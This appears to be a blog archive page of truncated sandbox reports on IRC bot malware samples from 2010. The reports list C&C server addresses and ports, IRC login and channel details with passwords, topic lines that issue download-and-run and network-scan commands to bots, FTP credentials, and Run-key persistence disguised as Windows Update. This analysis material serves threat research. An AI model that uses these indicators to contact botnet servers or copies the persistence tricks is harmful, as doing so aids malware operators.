Month: October 2010

Remote Host Port Number 184.73.209.168 80 204.0.5.41 80 204.0.5.48 80 204.0.5.49 80 204.0.5.51 80 204.0.5.57 80 204.0.5.58 80 204.0.5.59 80 216.178.38.103 80 216.178.38.168 80 205.234.236.19 1234 PASS xxx NICK NEW-[USA|00|P|36443] USER XP-9032 * 0 :COMPUTERNAME MODE NEW-[USA|00|P|36443] -ix JOIN #!nn! test PONG 22 MOTD * The data identified by the following URLs was then requestedRead more...

Remote Host Port Number 184.154.74.130 20 184.154.74.130 21 64.208.241.65 80 * The data identified by the following URLs was then requested from the remote web server: o http://update.adobe.com/pub/adobe/acrobat/js/6.x/rdr/win/enu/DataScript.js o http://update.adobe.com/pub/adobe/acrobat/js/6.x/rdr/win/enu/CodeScript.js o http://update.adobe.com/pub/adobe/acrobat/js/6.x/rdr/win/enu/UIScript.js o http://update.adobe.com/pub/adobe/acrobat/js/6.x/rdr/win/enu/ResourceScript.js o http://update.adobe.com/pub/adobe/acrobat/js/6.x/rdr/win/enu/MasterScript.js USER uploader@demo.ymlook.com passwd !234567* Registry Modifications * The following Registry Keys were created: o HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindowsFirewall o HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindowsFirewallDomainProfile o HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindowsFirewallStandardProfileRead more...

DNS Lookup Host Name IP Address webpro569.redirectme.net 46.4.245.19 C&C Server: 46.4.245.19:6667 Server Password: Username: 0127 Nickname: {N}|DEU|XP|DELL-D3E62F7E26|970986 Channel: #webpro (Password: SRR569) Channeltopic: :oppp pecie of candy Registry Changes by all processes Create or Open Changes HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun “Windows Update Sched” = c:BotCrypted.exe HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun “Windows Update Sched” = c:BotCrypted.exe HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesSharedAccessParametersFirewallPolicyStandardProfileAuthorizedApplicationsList “Windows Update Sched” = c:BotCrypted.exe Reads HKEY_LOCAL_MACHINESOFTWAREMicrosoft.NETFrameworkRead more...

Remote Host Port Number 174.139.92.250 4466,6764 USER waahud waahud waahud :cuipesjdhissjgkx NICK d[jLyAxEK]b MODE d[jLyAxEK]b +xi JOIN #balengor USERHOST d[jLyAxEK]b MODE #balengor +smntu PONG :binidic.net Now talking in #balengor Topic On: [ #balengor ] [ * exe 91.203.146.65 9933 ][ * ipscan s.s.s netapi -s ] Topic By: [ aessg ] Other details * TheRead more...

niktonidumal.biz 91.215.157.104 C&C Server: 91.215.157.104:81 Server Password: Username: 4390 Nickname: sdbahqa|INF|18|45|4|187| Channel: #iusb# (Password: ) Chanel : #biz# Channeltopic: :, !/98/115/36/73/121/96/119/48/55/34/122/125/119/50/113/98/117/109/126/122/102/124/37/71/89/121/109/120/110/100/55/105/111/110/46/79/47/102/113/71/ .s /99/106/112/81/55/59/40/125/111/122/35/108/97/127/114/97/121/103/119/59/104/109/106/84/65/124/108/52/105/120/116/37/112/113/110/70/104/111/39/82/114/112/60/111/104/40/50/59/39/63/37/32/18/17/45/113/121/67/118/110/41/80/70/71/40/57/39/18/44/55/22/50/54/56/58/46/86/119/71/ .j , Registry Changes by all processes Create or Open Changes HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun “MicrosoftUpdateServices” = Dokumente und EinstellungenAdministratorwinusbsmgr.exe Reads HKEY_LOCAL_MACHINESOFTWAREMicrosoftRpcSecurityService “DefaultAuthLevel” HKEY_LOCAL_MACHINESOFTWAREMicrosoftPCHealthErrorReporting “DoReport” HKEY_LOCAL_MACHINESOFTWAREMicrosoftPCHealthErrorReporting “ShowUI” HKEY_LOCAL_MACHINESOFTWAREMicrosoftPCHealthErrorReporting “AllOrNone” HKEY_LOCAL_MACHINESOFTWAREMicrosoftPCHealthErrorReporting “IncludeMicrosoftApps” HKEY_LOCAL_MACHINESOFTWAREMicrosoftPCHealthErrorReporting “IncludeWindowsApps” HKEY_LOCAL_MACHINESOFTWAREMicrosoftPCHealthErrorReporting “DoTextLog”Read more...

DNS Lookup Host Name IP Address 0 127.0.0.1 browseusers.myspace.com browseusers.myspace.com 216.178.38.168 x.myspacecdn.com myspace.ivwbox.de myspace.ivwbox.de 193.46.63.103 x.myspacecdn.com 212.201.100.176 pagead2.googlesyndication.com pagead2.googlesyndication.com 74.125.43.166 googleads.g.doubleclick.net googleads.g.doubleclick.net 74.125.43.154 www.google-analytics.com www.google-analytics.com 209.85.135.101 js.myspacecdn.com js.myspacecdn.com 212.201.100.169 cms.myspacecdn.com cms.myspacecdn.com 212.201.100.176 qs.ivwbox.de qs.ivwbox.de 91.215.101.32 b.myspace.com b.myspace.com 216.178.38.103 c4.ac-images.myspacecdn.com c1.ac-images.myspacecdn.com c3.ac-images.myspacecdn.com c4.ac-images.myspacecdn.com 195.176.255.157 c1.ac-images.myspacecdn.com 195.176.255.152 c2.ac-images.myspacecdn.com c3.ac-images.myspacecdn.com 195.176.255.143 c2.ac-images.myspacecdn.com 195.176.255.145 desk.opt.fimserve.com delb.opt.fimserve.com desk.opt.fimserve.com 63.135.86.39 delb.opt.fimserve.comRead more...

Remote Host Port Number 178.18.113.122 6667 Other details * The following port was open in the system: Port Protocol Process 1051 TCP [file and pathname of the sample #1] Registry Modifications * The following Registry Keys were created: o HKEY_LOCAL_MACHINESOFTWAREMicrosoftActive SetupInstalled Components{AAECD99A-AAA4-CD63-DDDF-5CF8BAD8D2F2 o HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionpoliciesExplorer o HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionpoliciesExplorerrun o HKEY_CURRENT_USERSoftwareMicrosoftActive SetupInstalled Components{AAECD99A-AAA4-CD63-DDDF-5CF8BAD8D2F2 * The newly created RegistryRead more...

Remote Host Port Number testusa.helohmar.com 8800 Resolved : [testusa.helohmar.com] To [76.73.36.42] Registry Modifications * The newly created Registry Values are: o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon] + Taskman = “C:RECYCLERS-1-5-21-0243556031-888888379-781863308-1455fddg.exe” so that fddg.exe runs every time Windows starts o [HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun] + Tji771 = “C:RECYCLERS-1-5-21-0243556031-888888379-781863308-1455fddg.exe” so that fddg.exe runs every time Windows starts o [HKEY_CURRENT_USERSoftwareMicrosoftWindows NTCurrentVersionWinlogon] + Shell =Read more...

Remote Host Port Number 178.63.148.49 6667 NICK n{USA|XP}693101 USER 4584 “” “TsGh” :4584 JOIN #Adam Registry Modifications * The newly created Registry Values are: o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun] + Windows Update System = “%AppData%winlogon.exe” + UserFaultCheck = “%System%dumprep 0 -u” so that winlogon.exe runs every time Windows starts o [HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun] + Windows Update System = “%AppData%winlogon.exe” soRead more...

Remote Host Port Number 66.187.110.152 81 NICK n[USA|XP]1167074 USER s “” “lol” :s JOIN #newbin# PONG 422 JOIN #USA (null) * The following port was open in the system: Port Protocol Process 1053 TCP msnd.exe (%AppData%msnd.exe) Memory Modifications * There was a new process created in the system: Process Name Process Filename Main Module SizeRead more...